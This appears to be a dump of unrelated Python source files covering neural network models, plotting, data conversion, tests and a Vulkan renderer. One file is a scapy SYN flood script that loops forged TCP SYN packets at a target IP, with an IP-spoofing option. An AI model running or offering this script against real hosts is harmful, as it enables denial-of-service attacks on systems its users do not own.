from .segmentation import SegmentationHead
from .attention import Attention
from .erfnet import ERFNet
class Normalize(nn.Module):
""" ImageNet normalization """
def __init__(self, mean, std):
super().__init__()
self.mean = nn.Parameter(torch.tensor(mean), requires_grad=False)
self.std = nn.Parameter(torch.tensor(std), requires_grad=False)
def forward(self, x):
return (x - self.mean[None,:,None,None]) / self.std[None,:,None,None]
class RGBModel(nn.Module):
def __init__(self, seg_channels, pretrained=True):
super().__init__()
self.num_channels = len(seg_channels)
self.backbone = resnet18(pretrained=pretrained)
self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
self.head = None
def forward(self, rgb):
embd = self.backbone(self.normalize(rgb/255.))
return self.head(embd).squeeze(-1)
class RGBSegmentationModel(nn.Module):
def __init__(self, seg_channels):
super().__init__()
self.erfnet = ERFNet(len(seg_channels)+1)
self.normalize = lambda x: (x/255.-.5)*2
def forward(self, rgb):
return self.erfnet(self.normalize(rgb))
class RGBBrakePredictionModel(nn.Module):
def __init__(self, seg_channels, pretrained=True):
super().__init__()
self.conv_backbone = resnet18(pretrained=pretrained)
self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
self.seg_head = SegmentationHead(512, len(seg_channels)+1)
self.classifier = nn.Sequential(
nn.Linear(1024,1),
nn.Sigmoid()
)
def forward(self, rgb1, rgb2, mask=False):
x1 = self.conv_backbone(self.normalize(rgb1/255.))
x2 = self.conv_backbone(self.normalize(rgb2/255.))
h1 = x1.mean(dim=[2,3])
h2 = x2.mean(dim=[2,3])
pred_bra = self.classifier(torch.cat([h1,h2], dim=1))
if mask:
pred_sem1 = F.interpolate(self.seg_head(x1), scale_factor=4)
pred_sem2 = F.interpolate(self.seg_head(x2), scale_factor=4)
return pred_bra[:,0], pred_sem1, pred_sem2
else:
return pred_bra[:,0]
|
61265
|
import sqlite3
import argparse
from os.path import join
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from keras.models import model_from_json
import preprocessing.config as cfg
import preprocessing.file_utils as futils
from preprocessing.data import LightDataManager
def paper_plot():
cnn_stator_id = 'ebb3'
cnn_rotor_id = '2950'
rnn_stator_id = 'f334'
rnn_rotor_id = 'c329'
plt.figure(figsize=(2*5, 2*2))
hp_reports = futils.HyperparameterSearchReport()
hp_reports.read_search(cnn_stator_id)
hp_reports.read_search(cnn_rotor_id)
hp_reports.read_search(rnn_stator_id)
hp_reports.read_search(rnn_rotor_id)
# hack: cut off first 50 iterations in RNN Stator search
tab = hp_reports.hp_searches[rnn_stator_id]
hp_reports.hp_searches[rnn_stator_id] = \
tab[tab.n_iter >= 50].reset_index(drop=True)
plt.subplot(2, 2, 1)
hp_reports.plot_convergence(rnn_stator_id, 'Stator (RNN)')
plt.ylabel(r'MSE in $\mathrm{K^2}$ (RNN)')
plt.xlabel('')
plt.title('')
plt.subplot(2, 2, 2)
hp_reports.plot_convergence(rnn_rotor_id, 'Rotor (RNN)')
plt.xlabel('')
plt.ylabel('')
plt.legend().remove()
plt.title('')
plt.subplot(2, 2, 3)
hp_reports.plot_convergence(cnn_stator_id, 'Stator (CNN)')
plt.legend().remove()
plt.title('')
plt.xlabel('Stator search iteration')
plt.ylabel(r'MSE in $\mathrm{K^2}$ (CNN)')
plt.subplot(2, 2, 4)
hp_reports.plot_convergence(cnn_rotor_id, 'Rotor (CNN)')
plt.xlabel('Rotor search iteration')
plt.ylabel('')
plt.legend().remove()
plt.title('')
# find best performing models
hp_reports.plot_best_models_performance(rnn_rotor_id, rnn_stator_id)
hp_reports.plot_best_models_performance(cnn_rotor_id, cnn_stator_id)
plt.show()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Visualize performance of the '
'given model uid.')
parser.add_argument('-s', '--stator_id', required=False,
help='The 4-digit id in hex of the experiment on '
'stator temperatures')
parser.add_argument('-r', '--rotor_id', required=False,
help='The 4-digit id in hex of the experiment on '
'rotor temperatures')
parser.add_argument('-p', '--paper_plot', required=False,
action='store_true',
help='Flag for ignoring given IDs and instead plot '
'four predefined searches for the IEMDC Paper')
args = parser.parse_args()
sns.set_context('paper')
sns.set_style('whitegrid')
if args.paper_plot:
paper_plot()
else:
assert args.rotor_id is not None and args.stator_id is not None
hp_reports = futils.HyperparameterSearchReport()
hp_reports.read_search(args.rotor_id)
hp_reports.read_search(args.stator_id)
try:
print('Plot stator temperature convergence ..')
plt.figure(figsize=(5, 2.4))
hp_reports.plot_convergence(args.stator_id)
print('Plot rotor temperature convergence ..')
plt.figure(figsize=(5, 2.4))
hp_reports.plot_convergence(args.rotor_id)
plt.show()
except Exception:
print('plot failed')
|
61273
|
import FWCore.ParameterSet.Config as cms
# BTagPerformanceAnalyzer configuration
from Validation.RecoB.bTagAnalysis_cfi import *
bTagValidationHarvest = bTagHarvestMC.clone()
from DQMOffline.RecoB.bTagAnalysisData_cfi import *
bTagValidationHarvestData = bTagHarvest.clone()
|
61294
|
from scapy.all import *
import argparse
parser = argparse.ArgumentParser(description="Simple SYN Flood Script")
parser.add_argument("target_ip", help="Target IP address (e.g router's IP)")
parser.add_argument("-p", "--port", help="Destination port (the port of the target's machine service, \
e.g 80 for HTTP, 22 for SSH and so on).")
# parse arguments from the command line
args = parser.parse_args()
# target IP address (should be a testing router/firewall)
target_ip = args.target_ip
# the target port u want to flood
target_port = args.port
# forge IP packet with target ip as the destination IP address
ip = IP(dst=target_ip)
# or if you want to perform IP Spoofing (will work as well)
# ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip)
# forge a TCP SYN packet with a random source port
# and the target port as the destination port
tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
# add some flooding data (1KB in this case, don't increase it too much,
# otherwise, it won't work.)
raw = Raw(b"X"*1024)
# stack up the layers
p = ip / tcp / raw
# send the constructed packet in a loop until CTRL+C is detected
send(p, loop=1, verbose=0)
|
61340
|
import ee
from zipfile import ZipFile
from io import BytesIO
import os
import requests
class S2indexes:
def __init__(self, area, dir, date_from, date_end, scope):
"""
given an area defined by a geoJSON, it returns rasters of
remote sensing indexes at the specified date at granularuity defined by the scope parameter
Args:
area: geoJSON, use squaretogeojson to generate
dir: directory where to save the easter
date_from, date_end: nightlights for what point in time?
scope (str): country or urban?
"""
self.area = area
self.dir = dir
self.date_from = date_from
self.date_end = date_end
self.scope = scope
self.files = None
def download(self):
print('INFO: downloading rms indexes for area of interest ...')
if os.path.exists(self.dir + str(self.area["coordinates"]) + "NDVI_max.tif") \
and os.path.exists(self.dir + str(self.area["coordinates"]) + "NDBI_max.tif") \
and os.path.exists(self.dir + str(self.area["coordinates"]) + "NDWI_max.tif"):
self.files = [str(self.area["coordinates"]) + "NDVI_max.tif", str(self.area["coordinates"]) + "NDBI_max.tif", str(self.area["coordinates"]) + "NDWI_max.tif"]
print('INFO: NDs data for {} already downloaded'.format(self.area["coordinates"]))
else:
ee.Initialize()
GREEN = 'B3'
RED = 'B4'
NIR = 'B8'
SWIR = 'B11'
sentinel = ee.ImageCollection('COPERNICUS/S2') \
.filterDate(ee.Date(self.date_from), ee.Date(self.date_end)) \
.filterBounds(self.area) \
.select([GREEN, RED, NIR, SWIR]) \
.filterMetadata('CLOUDY_PIXEL_PERCENTAGE', 'less_than', 70)
def addIndices(image):
ndvi = image.normalizedDifference([NIR, RED])
ndbi = image.normalizedDifference([SWIR, NIR])
ndwi = image.normalizedDifference([GREEN, NIR])
return image.addBands(ndvi.rename('NDVI')) \
.addBands(ndbi.rename('NDBI')) \
.addBands(ndwi.rename('NDWI'))
img = sentinel.map(addIndices).select(['NDVI', 'NDBI', 'NDWI']).reduce("max").clip(self.area)
# download
if self.scope == 'urban':
print('INFO: NDs scope > urban')
scale = 100
else:
print('INFO: NDs scope -> country')
scale = 5000
for b in ['NDVI_max', 'NDBI_max', 'NDWI_max']:
url = img.select(b).getDownloadUrl({'crs': 'EPSG:4326', 'region': self.area, 'scale': scale})
r = requests.get(url)
z = ZipFile(BytesIO(r.content))
z.extract(z.namelist()[1], self.dir)
os.rename(self.dir + z.namelist()[1], self.dir + str(self.area["coordinates"]) + b+'.tif')
self.files = [str(self.area["coordinates"]) + "NDVI_max.tif", str(self.area["coordinates"]) + "NDBI_max.tif",
str(self.area["coordinates"]) + "NDWI_max.tif"]
def rms_values(self, longitudes, latitudes):
"""
Given a dataset with latitude and longitude columns, it returns the nightlight value at each point.
Args:
longitudes: list of longitudes
latitudes: list of latitudes
Returns:
Series
"""
import rasterio
try:
NDVI = rasterio.open(self.dir + self.files[0])
NDBI = rasterio.open(self.dir + self.files[1])
NDWI = rasterio.open(self.dir + self.files[2])
except MemoryError:
print('Remote sensing indexes rasters too big!')
raise
veg, build, wat = [], [], []
for lon, lat in zip(longitudes, latitudes):
i, j = NDVI.index(lon, lat)
veg.append(NDVI.read(1)[i, j])
build.append(NDBI.read(1)[i, j])
wat.append(NDWI.read(1)[i, j])
return veg, build, wat
|
61346
|
class Solution(object):
def productExceptSelf(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
|
61349
|
import pandas as pd
import numpy as np
from numpy import corrcoef
import matplotlib.pyplot as plt
from sklearn.feature_selection import chi2
from sklearn.feature_selection import f_classif
from math import *
plt.style.use('ggplot')
fig = plt.figure()
COUNTER = 1
#Return the category dictionary,categorical variables list and continuous list for every column in dataframe.
#The categories are assigned as "target(type)_feature(type)"
def get_category(df,target_name,categorical_name,columns_name):
cat_dict = {}
fin_cat_dict = {}
catg_catg = []
cont_cont = []
catg_cont = []
cont_catg = []
for col in columns_name:
if len(df[col].unique())<=2:
cat_dict[col] = "categorical"
elif col in categorical_name:
cat_dict[col] = "categorical"
else:
cat_dict[col] = "continous"
for col in cat_dict:
if cat_dict[col]=="categorical" and cat_dict[target_name]=="categorical":
fin_cat_dict[col] = "catg_catg"
catg_catg.append(col)
elif cat_dict[col]=="continous" and cat_dict[target_name]=="continous":
fin_cat_dict[col] = "cont_cont"
cont_cont.append(col)
elif cat_dict[col]=="continous" and cat_dict[target_name]=="categorical":
fin_cat_dict[col] = "catg_cont"
catg_cont.append(col)
else:
fin_cat_dict[col] = "cont_catg"
cont_catg.append(col)
return fin_cat_dict,catg_catg,cont_cont,catg_cont,cont_catg
#Return True if the categorical_name are present in the orignal dataframe columns.
def is_present(columns_name,categorical_name):
ls = [i for i in categorical_name if i not in columns_name]
if len(ls)==0:
return True
else:
raise ValueError(str(ls)+" is not present as a column in the data,Please check the name")
#Function returns list of columns with non-numeric data.
def clean_str_list(df,lst):
rem=[]
for i in lst:
res = any(isinstance(n,str) for n in df[i])
if res == True:
rem.append(i)
for j in rem:
lst.remove(j)
return lst
#Returns the Pearson Correlation Coefficient for the continous data columns.
def pearson_correlation_cont_cont(x,y):
return corrcoef(x,y)
# This function is for the bivariate analysis between two continous varibale.Plots scatter plots and shows the coeff for the data.
def bivariate_analysis_cont_cont(cont_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
clean_cont_cont_list = clean_str_list(df,cont_cont_list)
if len(clean_str_list(df,[target_name])) == 0 and len(cont_cont_list)>0:
raise ValueError("You seem to have a target variable with string values.")
clean_df = df.dropna()
for col in clean_cont_cont_list:
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = clean_df[col]
y = np.float32(clean_df[target_name])
corr = pearson_correlation_cont_cont(x,y)
plt.xlabel(col+"\n count "+str(count)+"\n Corr: "+str(np.float32(corr[0][1])), fontsize=10)
plt.ylabel(target_name, fontsize=10)
plt.scatter(x,y)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
#Chi test is used to see association between catgorical vs categorical variables.
#Lower Pvalue are significant they should be < 0.05
#chi value = X^2 = summation [(observed-expected)^2/expected]
# The distribution of the statistic X2 is chi-square with (r-1)(c-1) degrees of freedom, where r represents the number of rows in the two-way table and c represents the number of columns. The distribution is denoted (df), where df is the number of degrees of freedom.
#pvalue = p(df>=x^2)
def evaluate_chi(x,y):
chi,p_val = chi2(x,y)
return chi,p_val
def bivariate_analysis_catg_catg(catg_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size="auto"):
clean_catg_catg_list = clean_str_list(df,catg_catg_list)
clean_df = df.dropna()
target_classes =df[target_name].unique()
label = [str(i) for i in target_classes]
c = 0
for col in clean_catg_catg_list:
summary = clean_df[col].describe()
binwidth = 0.7
if bin_size == 'auto':
bins_size =np.arange(min(clean_df[col].tolist()), max(clean_df[col].tolist()) + binwidth, binwidth)
else:
bins_size = bin_size
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in target_classes]
y = clean_df[target_name]
chi,p_val = evaluate_chi(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(col+"\n chi: "+str(np.float32(chi[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel("Frequency", fontsize=10)
plt.hist(x,bins=bins_size,stacked=True,label = label)
plt.legend(prop={'size': 10})
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
c+=1
return plt,COUNTER
# Analysis of variance (ANOVA) is a collection of statistical models used to analyze the differences among group means and their associated procedures (such as "variation" among and between groups)
# In its simplest form, ANOVA provides a statistical test of whether or not the means of several groups are equal, and therefore generalizes the t-test to more than two groups. ANOVAs are useful for comparing (testing) three or more means (groups or variables) for statistical significance.
# A one-way ANOVA is used to compare the means of more than two independent groups. A one-way ANOVA comparing just two groups will give you the same results as the independent t test.
def evaluate_anova(x,y):
F_value,pvalue = f_classif(x,y)
return F_value,pvalue
# In descriptive statistics, a box plot or boxplot is a convenient way of graphically depicting groups of numerical data through their quartiles. Box plots may also have lines extending vertically from the boxes (whiskers) indicating variability outside the upper and lower quartiles, hence the terms box-and-whisker plot and box-and-whisker diagram.
# Quartile: In descriptive statistics, the quartiles of a ranked set of data values are the three points that divide the data set into four equal groups, each group comprising a quarter of the data
def bivariate_analysis_cont_catg(cont_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
clean_cont_catg_list = clean_str_list(df,cont_catg_list)
if len(clean_str_list(df,[target_name])) == 0 and len(cont_catg_list)>0:
raise ValueError("You seem to have a target variable with string values.")
clean_df = df.dropna()
for col in clean_cont_catg_list:
col_classes =clean_df[col].unique()
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[col]==i][target_name]) for i in col_classes]
y = np.float32(clean_df[target_name])
f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(col+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel(target_name, fontsize=10)
plt.boxplot(x)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
# This function is for the bivariate analysis between categorical vs continuous varibale.Plots box plots.
def bivariate_analysis_catg_cont(catg_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
# No need to remove string varible as they are handled by chi2 function of sklearn.
# clean_catg_cont_list = clean_str_list(df,catg_cont_list)
clean_catg_cont_list = catg_cont_list
clean_df = df.dropna()
for col in clean_catg_cont_list:
col_classes =df[target_name].unique()
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in col_classes]
y = clean_df[target_name]
f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(target_name+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel(col, fontsize=10)
plt.boxplot(x)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
#returns the total number of subplots to be made.
def total_subplots(df,lst):
clean_df = df.dropna()
total = [len(clean_str_list(clean_df,i)) for i in lst]
return sum(total)
# This function returns new categotical list after removing drop values if in case they are written in both drop and categorical_name list.
def remove_drop_from_catglist(drop,categorical_name):
for col in drop:
if col in categorical_name:
categorical_name.remove(col)
return categorical_name
def plot(data_input,target_name="",categorical_name=[],drop=[],PLOT_COLUMNS_SIZE = 4,bin_size="auto",wspace=0.5,hspace=0.8):
"""
This is the main function to give Bivariate analysis between the target variable and the input features.
Parameters
-----------
data_input : Dataframe
This is the input Dataframe with all data.
target_name : String
The name of the target column.
categorical_name : list
Names of all categorical variable columns with more than 2 classes, to distinguish with the continuous variables.
drop : list
Names of columns to be dropped.
PLOT_COLUMNS_SIZE : int
Number of plots to display vertically in the display window.The row size is adjusted accordingly.
bin_size : int ;default="auto"
Number of bins for the histogram displayed in the categorical vs categorical category.
wspace : int ;default = 0.5
Horizontal padding between subplot on the display window.
hspace : int ;default = 0.5
Vertical padding between subplot on the display window.
-----------
"""
if type(data_input).__name__ == "DataFrame" :
# Column names
columns_name = data_input.columns.values
#To drop user specified columns.
if is_present(columns_name,drop):
data_input = data_input.drop(drop,axis=1)
columns_name = data_input.columns.values
categorical_name = remove_drop_from_catglist(drop,categorical_name)
else:
raise ValueError("Couldn't find it in the input Dataframe!")
if target_name == "":
raise ValueError("Please mention a target variable")
#Checks if the categorical_name are present in the orignal dataframe columns.
categorical_is_present = is_present(columns_name,categorical_name)
target_is_present = is_present(columns_name,[target_name])
if categorical_is_present:
fin_cat_dict,catg_catg_list,cont_cont_list,catg_cont_list,cont_catg_list = get_category(data_input,target_name,categorical_name,columns_name)
#Subplot(Total number of graphs)
total = total_subplots(data_input,[cont_cont_list,catg_catg_list,catg_cont_list,cont_catg_list])
if total < PLOT_COLUMNS_SIZE:
total = PLOT_COLUMNS_SIZE
PLOT_ROW_SIZE = ceil(float(total)/PLOT_COLUMNS_SIZE)
#Call various functions
plot,count = bivariate_analysis_cont_cont(cont_cont_list,data_input,target_name,total,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
plot,count = bivariate_analysis_catg_catg(catg_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size=bin_size)
plot,count = bivariate_analysis_cont_catg(cont_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
plot,count = bivariate_analysis_catg_cont(catg_cont_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
fig.subplots_adjust(bottom=0.08,left = 0.05,right=0.97,top=0.93,wspace = wspace,hspace = hspace)
plot.show()
else:
raise ValueError("Make sure input data is a Dataframe.")
|
61351
|
from qsearch import Project, solvers, unitaries, utils, multistart_solvers, parallelizers, compiler, options
import scipy as sp
import os
try:
from qsrs import BFGS_Jac_SolverNative, LeastSquares_Jac_SolverNative
except ImportError:
BFGS_Jac_SolverNative = None
LeastSquares_Jac_SolverNative = None
import pytest
import tempfile
import os
import sys
qft3 = unitaries.qft(8)
def test_cobyla(project):
project.add_compilation('qft2', unitaries.qft(4))
project['solver'] = solvers.COBYLA_Solver()
project.run()
def test_bfgs_jac(project):
project.add_compilation('qft3', qft3)
project['solver'] = solvers.BFGS_Jac_Solver()
project.run()
def test_least_squares_jac(project):
project.add_compilation('qft3', qft3)
project['solver'] = solvers.LeastSquares_Jac_Solver()
project['error_residuals'] = utils.matrix_residuals
project['error_residuals_jac'] = utils.matrix_residuals_jac
project.run()
@pytest.mark.skipif(sys.platform == 'win32', reason="This test currently hangs due to the nested parallel executor")
def test_multistart_least_squares(project):
project.add_compilation('qft3', qft3)
project['solver'] = multistart_solvers.MultiStart_Solver(2)
project['inner_solver'] = solvers.LeastSquares_Jac_Solver()
project['parallelizer'] = parallelizers.ProcessPoolParallelizer
project['error_residuals'] = utils.matrix_residuals
project['error_residuals_jac'] = utils.matrix_residuals_jac
project.run()
@pytest.mark.skipif(sys.platform == 'win32', reason="This test currently hangs due to the nested parallel executor")
def test_multistart_bfgs(project):
project.add_compilation('qft3', qft3)
project['solver'] = multistart_solvers.MultiStart_Solver(2)
project['inner_solver'] = solvers.BFGS_Jac_Solver()
project['parallelizer'] = parallelizers.ProcessPoolParallelizer
project.run()
def compile(U, solver):
with tempfile.TemporaryDirectory() as dir:
opts = options.Options()
opts.target = U
opts.error_func = utils.matrix_distance_squared
opts.error_jac = utils.matrix_distance_squared_jac
opts.solver = solver
opts.log_file = os.path.join(dir, 'test.log')
comp = compiler.SearchCompiler()
res = comp.compile(opts)
return res
@pytest.mark.skipif(BFGS_Jac_SolverNative is None, reason="The rustopt feature has not been enabled")
def test_rust_solver_qft3():
U = unitaries.qft(8)
res = compile(U, BFGS_Jac_SolverNative())
circ = res['structure']
v = res['parameters']
assert utils.matrix_distance_squared(U, circ.matrix(v)) < 1e-10
@pytest.mark.skipif(LeastSquares_Jac_SolverNative is None, reason="The rustopt feature has not been enabled")
def test_rust_solver_qft3():
U = unitaries.qft(8)
res = compile(U, LeastSquares_Jac_SolverNative())
circ = res['structure']
v = res['parameters']
assert utils.matrix_distance_squared(U, circ.matrix(v)) < 1e-10
|
61356
|
import os
import numpy as np
def save_samples_truncted_prob(fname, points, prob):
'''
Save the visualization of sampling to a ply file.
Red points represent positive predictions.
Green points represent negative predictions.
Parameters
fname: File name to save
points: [N, 3] array of points
prob: [1, N] array of predictions in the range [0~1]
Return:
None
'''
prob = prob.transpose(0, 1).detach().numpy()
r = (prob > 0.5).reshape([-1, 1]) * 255
g = (prob < 0.5).reshape([-1, 1]) * 255
b = np.zeros(r.shape)
to_save = np.concatenate([points, r, g, b,prob], axis=-1)
return np.savetxt(fname,
to_save,
fmt='%.6f %.6f %.6f %d %d %d %.6f',
comments='',
header=(
'ply\nformat ascii 1.0\nelement vertex {:d}\nproperty float x\nproperty float y\nproperty float z\nproperty uchar red\nproperty uchar green\nproperty uchar blue\nproperty float prob\nend_header').format(
points.shape[0])
)
def save_gallery(preds,samples,names,gallery_id,epoch):
pred = preds[0].cpu()
sample = samples[0].transpose(0, 1).cpu()
name = names[0]
save_gallery_path = os.path.join(gallery_id,name.split('/')[-2],"epoch_{:03d}".format(epoch))
os.makedirs(save_gallery_path,exist_ok=True)
path = os.path.join(save_gallery_path,'pred.ply')
save_samples_truncted_prob(path,sample,pred)
|
61386
|
from vulkan import vk, helpers as hvk
class Renderer(object):
def __init__(self, engine):
self.engine = engine
self.image_ready = None
self.rendering_done = None
self.render_fences = ()
self.render_cache = {}
self.enabled = True
self._setup_sync()
self._setup_render_cache()
def free(self):
engine, api, device = self.ctx
hvk.destroy_semaphore(api, device, self.image_ready)
hvk.destroy_semaphore(api, device, self.rendering_done)
for f in self.render_fences:
hvk.destroy_fence(api, device, f)
del self.engine
@property
def ctx(self):
engine = self.engine
api, device = engine.api, engine.device
return engine, api, device
def render(self, scene_data):
if not self.enabled:
return
h = hvk
engine, api, device = self.ctx
render_queue = engine.render_queue.handle
rc = self.render_cache
image_index, result = h.acquire_next_image(api, device, engine.swapchain, semaphore = self.image_ready)
fence = self.render_fences[image_index]
h.wait_for_fences(api, device, (fence,))
h.reset_fences(api, device, (fence,))
scene_data.record(image_index)
submit = rc["submit_info"]
submit.command_buffers[0] = scene_data.render_commands[image_index]
h.queue_submit(api, render_queue, (submit,), fence = fence)
present = rc["present_info"]
present.image_indices[0] = image_index
h.queue_present(api, render_queue, present)
def enable(self):
self.enabled = True
def disable(self):
_, api, device = self.ctx
hvk.device_wait_idle(api, device)
self.enabled = False
def _setup_sync(self):
engine, api, device = self.ctx
info = hvk.semaphore_create_info()
self.image_ready = hvk.create_semaphore(api, device, info)
self.rendering_done = hvk.create_semaphore(api, device, info)
self.render_fences = []
info = hvk.fence_create_info(flags=vk.FENCE_CREATE_SIGNALED_BIT)
for _ in range(len(engine.render_target.swapchain_images)):
self.render_fences.append(hvk.create_fence(api, device, info))
def _setup_render_cache(self):
engine = self.engine
self.render_cache["submit_info"] = hvk.submit_info(
wait_dst_stage_mask = (vk.PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT,),
wait_semaphores = (self.image_ready,),
signal_semaphores = (self.rendering_done,),
command_buffers = (0,)
)
self.render_cache["present_info"] = hvk.present_info(
swapchains = (engine.swapchain,),
image_indices = (0,),
wait_semaphores = (self.rendering_done,)
)
|
61435
|
import sys
from collections import namedtuple, defaultdict
import concrete
from concrete.util import CommunicationReader
import numpy as np
import json
Mention = namedtuple("Mention", "text start end sentence entityType confidence uuid")
def get_entities(comm, entity_tool):
"""
Returns:
list of concrete.Entity objects
"""
entity_set_index = concrete.util.metadata.get_index_of_tool(
comm.entitySetList, entity_tool)
if entity_set_index == -1:
print(f"Could not find EntitySet with tool name {entity_tool}")
return []
else:
return comm.entitySetList[entity_set_index].entityList
def comm_to_dict(comm, entity_tool):
output_dict = {}
output_dict['doc_id'] = comm.id
# Assume single section in sectionList
sentences = []
sentence_tokenization_uuids = {}
offset_dicts = {
"idx_to_char_offsets": {},
"char_offsets_to_idx": {}
}
# Read comm into list of tokenized sentences.
for i, sentence in enumerate(comm.sectionList[0].sentenceList):
sentence_tokenization_uuids[i] = sentence.tokenization.uuid.uuidString
sentence_text = []
idx_to_char_offsets = {}
char_offsets_to_idx = {}
for token in sentence.tokenization.tokenList.tokenList:
token_idx = token.tokenIndex
token_start = token.textSpan.start
token_ending = token.textSpan.ending
token = token.text
sentence_text.append(token)
idx_to_char_offsets[token_idx] = (token_start, token_ending)
char_offsets_to_idx[(token_start, token_ending)] = token_idx
offset_dicts["idx_to_char_offsets"][i] = idx_to_char_offsets
offset_dicts["char_offsets_to_idx"][i] = char_offsets_to_idx
sentences.append(sentence_text)
output_dict["sentences"] = sentences
output_dict["offset_dicts"] = offset_dicts
# Compute offsets
sentence_offsets = np.cumsum([0] + [len(s) for s in sentences])
tokenization_to_sent = {uuid:idx
for idx, uuid in sentence_tokenization_uuids.items()}
output_dict['entity_set_list'] = []
# Read through entity mention set list
mention_list = []
mention_uuid_map = {}
mention_skip_map = {}
for ms_idx, mention_set in enumerate(comm.entityMentionSetList):
# print ("{} mention_list: {}".format(ms_idx, len(mention_set.mentionList)))
for mention in mention_set.mentionList:
tokens = mention.tokens.tokenIndexList
tokenizationId = mention.tokens.tokenizationId
sentId = tokenization_to_sent[mention.tokens.tokenizationId.uuidString]
sent_toks = [sentences[sentId][idx] for idx in tokens]
m = Mention(text=mention.text,
start=min(tokens),
end=max(tokens),
sentence=sentId,
entityType=mention.entityType,
confidence=mention.confidence,
uuid=mention.uuid)
mention_list.append(m)
mention_uuid_map[mention.uuid.uuidString] = m
output_dict['mentions'] = [(int(sentence_offsets[m.sentence] + m.start),
int(sentence_offsets[m.sentence] + m.end))
for m in mention_list]
# Convert Mention to doc-level (start, end) and update mapping
mention_map = defaultdict(list)
for m in mention_list:
start = int(sentence_offsets[m.sentence] + m.start)
end = int(sentence_offsets[m.sentence] + m.end)
mention_map[(start, end)].append(m)
output_dict["mention_map"] = mention_map
output_dict["clusters"] = []
# Get entity set list using entity_tool
if entity_tool is not None:
entity_list = get_entities(comm, entity_tool)
uuid_clusters = []
print (f"Found entity list with {len(entity_list)} entities")
for entity in entity_list:
if entity.mentionIdList:
uuid_clusters.append(entity.mentionIdList)
mention_count = 0
clusters = []
seen = set()
for cluster in uuid_clusters:
entity_list = []
for mention_uuid in cluster:
if mention_uuid.uuidString not in seen:
seen.add(mention_uuid.uuidString)
else:
print(f"{mention_uuid} in two different clusters")
m = mention_uuid_map[mention_uuid.uuidString]
start = int(sentence_offsets[m.sentence] + m.start)
end = int(sentence_offsets[m.sentence] + m.end)
entity_list.append([start, end])
if entity_list:
clusters.append(entity_list)
# Ensure every mention is used in exactly one cluster
assert(len(mention_uuid_map) == len(seen))
output_dict["clusters"] = clusters
return (output_dict, comm)
def make_data_iter(path, entity_tool):
for (comm, filename) in CommunicationReader(path):
print (f"Entity_tool: {entity_tool}")
yield comm_to_dict(comm, entity_tool)
if __name__ == "__main__":
input_comms = sys.argv[1]
output_file = sys.argv[2]
if len(sys.argv) > 3:
entity_tool = sys.argv[3]
else:
entity_tool = None
examples_iter = make_data_iter(input_comms, entity_tool)
output_file = open(output_file, 'w+')
for example, _ in examples_iter:
clean_version = {
"sentences": example["sentences"],
"doc_key": example["doc_id"],
}
if example["clusters"]:
clean_version["clusters"] = example["clusters"]
else:
clean_version["clusters"] = [[span] for span in set(example["mentions"])]
num_clusters = len(clean_version["clusters"])
num_mentions = sum([len(cluster) for cluster in clean_version["clusters"]])
num_total_mentions = sum([len(mention) for mention in example["mention_map"].values()])
print(f"Wrote {num_clusters} clusters and {num_mentions} mentions" +
f" (out of {num_total_mentions}) to {clean_version['doc_key']}")
output_file.write(json.dumps(clean_version) + "\n")
|
61441
|
import os
from koala.server import koala_host
from koala.server.fastapi import *
from sample.fastapi.http_api import *
import sample.player
koala_host.init_server(globals().copy(), f"{os.getcwd()}/sample/app.yaml")
koala_host.use_pd()
koala_host.listen_fastapi()
koala_host.run_server()
|
61464
|
from pyspark.sql.types import (
ArrayType,
